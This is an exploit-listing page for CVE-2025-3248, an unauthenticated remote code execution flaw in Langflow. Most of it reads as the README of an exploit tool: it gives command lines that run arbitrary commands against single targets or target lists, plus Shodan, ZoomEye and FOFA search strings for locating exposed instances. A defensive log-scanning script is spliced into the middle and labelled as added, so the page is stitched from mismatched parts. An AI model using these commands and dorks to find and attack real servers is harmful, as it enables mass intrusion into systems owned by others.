## https://sploitus.com/exploit?id=38CE1CAF-BF08-52D8-91A3-AE6E545881F8
# CVE-2025-3248 - Langflow RCE Exploit
Remote Code Execution (RCE) exploit for **Langflow** applications vulnerable to **CVE-2025-3248**.
- **Affected Endpoint:** `/api/v1/validate/code`
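
For defenders, the affected endpoint gives a concrete log signature. The following is an added example, not part of the original README or the exploit script: it scans access logs for POST requests to `/api/v1/validate/code`. The reverse proxy, the combined log format, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict
from posixpath import normpath
from urllib.parse import unquote

# Endpoint this page names as affected by CVE-2025-3248.
AFFECTED_PATH = "/api/v1/validate/code"

# Assumption: a reverse proxy in front of Langflow writes combined-format logs.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

def canonical_path(target):
    """Drop query/fragment, percent-decode, and collapse '//', '.', '..' and a
    trailing slash, so re-encoded spellings of the path still compare equal."""
    path = unquote(re.split(r"[?#]", target, maxsplit=1)[0])
    return normpath("/" + path.lstrip("/"))

def find_hits(lines):
    """Return {client_ip: [(timestamp, status), ...]} for POSTs to the endpoint."""
    hits = defaultdict(list)
    for line in lines:
        m = LOG_RE.match(line)
        if m and m["method"] == "POST" and canonical_path(m["target"]) == AFFECTED_PATH:
            hits[m["ip"]].append((m["ts"], int(m["status"])))
    return dict(hits)

def reached_app(hits):
    """Clients that got at least one 2xx, i.e. were not blocked upstream."""
    return sorted(ip for ip, ev in hits.items() if any(200 <= s < 300 for _, s in ev))

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE = [
    '198.51.100.23 - - [12/May/2025:10:01:44 +0000] "POST /api/v1/validate/code HTTP/1.1" 200 212 "-" "python-requests/2.31.0"',
    '198.51.100.23 - - [12/May/2025:10:01:45 +0000] "POST /api/v1/%76alidate/code?x=1 HTTP/1.1" 200 198 "-" "python-requests/2.31.0"',
    '192.0.2.7 - - [12/May/2025:10:02:10 +0000] "GET /api/v1/flows/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [12/May/2025:10:03:02 +0000] "POST /api/v1//validate/code/ HTTP/1.1" 403 0 "-" "curl/8.5.0"',
    '192.0.2.7 - - [12/May/2025:10:04:00 +0000] "GET /api/v1/validate/code HTTP/1.1" 405 31 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    hits = find_hits(SAMPLE)
    for ip, events in hits.items():
        print(ip, events)
    print("reached application:", reached_app(hits))
```

Because the endpoint requires no authentication, any external client listed by `reached_app` warrants review of the host that served the request.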
---
## Exploit Features
- Remote & unauthenticated RCE
- No authentication required
- Python3 one-liner script
- Colorized terminal output for clarity
---
## Usage
```bash
python3 langflow_rce.py -u http://target:7860 -c "id"
python3 langflow_rce.py -i target.txt -c "id"
python3 langflow_rce.py -i target.txt -c "id" -p http://127.0.0.1:8080
```
## Dork
```
Shodan:
http.title:"Langflow" "Langflow allows you to build LLM applications"
title:"Langflow"
ZoomEye:
title:"Langflow" && body:"Langflow allows you to build LLM applications"
app:"Langflow"
FOFA:
title="Langflow" && body="Langflow allows you to build LLM applications"
app="Langflow"
```